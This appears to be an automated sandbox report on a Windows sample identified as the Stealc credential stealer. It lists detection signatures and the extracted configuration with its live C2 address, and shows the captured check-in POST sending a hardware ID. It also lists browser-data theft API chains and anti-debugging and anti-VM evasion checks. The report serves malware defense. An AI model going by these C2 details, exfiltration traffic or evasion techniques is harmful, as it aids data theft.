Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525474
MD5: 0ab8fd273f356fc72fc0d8971976f60e
SHA1: f88991b3868aad8231d28caa354f0f8a29deeb3b
SHA256: 6b87bd43d236ccd979ff563fea34490f006871209d6db9123c494a1a9138fd2d
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0AB8FD273F356FC72FC0D8971976F60E)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 3536 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 3536 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.b00000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-04T09:45:05.821293+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.b00000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpV | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpn | Virustotal: Detection: 16%
Source: http://185.215.113.37/H | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_00B0C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00B09AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00B07240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00B09B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00B18EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00B138B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00B14910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00B0DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00B0E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00B0ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00B14570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00B0F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00B13EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0F68A FindFirstFileA | 0_2_00B0F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00B016D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00B0DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00B0BE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 41 43 43 46 45 31 33 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 2d 2d 0d 0a
    Data Ascii:
    ------AEHIECAFCGDBFHIDBKFC
    Content-Disposition: form-data; name="hwid"

    42BACCFE13991312647697
    ------AEHIECAFCGDBFHIDBKFC
    Content-Disposition: form-data; name="build"

    doma
    ------AEHIECAFCGDBFHIDBKFC--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00B04880
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 42 41 43 43 46 45 31 33 39 39 31 33 31 32 36 34 37 36 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 2d 2d 0d 0a
    Data Ascii:
    ------AEHIECAFCGDBFHIDBKFC
    Content-Disposition: form-data; name="hwid"

    42BACCFE13991312647697
    ------AEHIECAFCGDBFHIDBKFC
    Content-Disposition: form-data; name="build"

    doma
    ------AEHIECAFCGDBFHIDBKFC--
Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/H
Source: file.exe, 00000000.00000002.2102191694.0000000001255000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D8F0 | 0_2_00D7D8F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 | 0_2_00ED50D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6209A | 0_2_00F6209A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6B070 | 0_2_00F6B070
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E7F9BE | 0_2_00E7F9BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D98902 | 0_2_00D98902
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D85A3F | 0_2_00D85A3F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E393D0 | 0_2_00E393D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDD3A7 | 0_2_00EDD3A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED2392 | 0_2_00ED2392
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E65303 | 0_2_00E65303
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE24C9 | 0_2_00EE24C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDBCB7 | 0_2_00EDBCB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4C5E0 | 0_2_00E4C5E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6D6A5 | 0_2_00E6D6A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EDEE6A | 0_2_00EDEE6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9E65 | 0_2_00ED9E65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D87FC0 | 0_2_00D87FC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB7F8D | 0_2_00DB7F8D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7FF2C | 0_2_00D7FF2C
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00B045C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: incycuuu ZLIB complexity 0.9948040822407628
Source: file.exe, 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00B18680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00B13720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\6UEFEYYD.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1874432 > 1048576
Source: file.exe | Static PE information: Raw size of incycuuu is bigger than: 0x100000 < 0x1a3800

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.b00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;incycuuu:EW;crmoanhn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;incycuuu:EW;crmoanhn:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00B19860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d86c3 should be: 0x1c9eb3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: incycuuu
Source: file.exe | Static PE information: section name: crmoanhn
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F990F3 push 59A68E01h; mov dword ptr [esp], edi | 0_2_00F991A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE78ED push ecx; mov dword ptr [esp], ebp | 0_2_00FE7857
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D8F0 push 74A684E4h; mov dword ptr [esp], edx | 0_2_00D7D9F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D8F0 push 54BD4ECFh; mov dword ptr [esp], ebp | 0_2_00D7D9F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D8F0 push ebx; mov dword ptr [esp], ecx | 0_2_00D7DA7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7D8F0 push edx; mov dword ptr [esp], 532E0CC3h | 0_2_00D7DB30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FE88D9 push 16A54A02h; mov dword ptr [esp], ebx | 0_2_00FE8953
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push esi; mov dword ptr [esp], 3E79D0C7h | 0_2_00ED5108
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push eax; mov dword ptr [esp], edx | 0_2_00ED513B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], esi | 0_2_00ED514A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], 7DCAE4A4h | 0_2_00ED514E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push edi; mov dword ptr [esp], ebx | 0_2_00ED516E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push 37ABE7EFh; mov dword ptr [esp], eax | 0_2_00ED51FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push 663CA09Ch; mov dword ptr [esp], ecx | 0_2_00ED5242
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push 2053C220h; mov dword ptr [esp], eax | 0_2_00ED5290
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push esi; mov dword ptr [esp], ecx | 0_2_00ED52A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ebx; mov dword ptr [esp], eax | 0_2_00ED52BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push eax; mov dword ptr [esp], edx | 0_2_00ED52BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push eax; mov dword ptr [esp], esi | 0_2_00ED52D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 73EEE629h | 0_2_00ED53E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ecx; mov dword ptr [esp], 2E306851h | 0_2_00ED547F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 52AA1206h | 0_2_00ED54FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push edx; mov dword ptr [esp], ebp | 0_2_00ED55AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 1F7D4B58h | 0_2_00ED55AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push esi; mov dword ptr [esp], 4A48A473h | 0_2_00ED55F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push 24841E3Ch; mov dword ptr [esp], ecx | 0_2_00ED562D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push ebp; mov dword ptr [esp], 74BB4129h | 0_2_00ED5636
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push eax; mov dword ptr [esp], ebx | 0_2_00ED5684
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push eax; mov dword ptr [esp], ebp | 0_2_00ED56CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push 7626C042h; mov dword ptr [esp], edx | 0_2_00ED56D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED50D9 push esi; mov dword ptr [esp], eax | 0_2_00ED56E7
Source: file.exe | Static PE information: section name: incycuuu entropy: 7.953045233922871

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00B19860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13701
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE672D second address: EE6749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jp 00007F2AD9523876h 0x0000000d jmp 00007F2AD952387Eh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6898 second address: EE68A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE68A2 second address: EE68A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6B76 second address: EE6B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6D1E second address: EE6D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6D24 second address: EE6D47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2AD900F598h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F2AD900F5A1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6D47 second address: EE6D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6EBB second address: EE6EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE6EC1 second address: EE6EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE98CA second address: EE98D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE98D1 second address: EE98DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE98DF second address: EE98ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
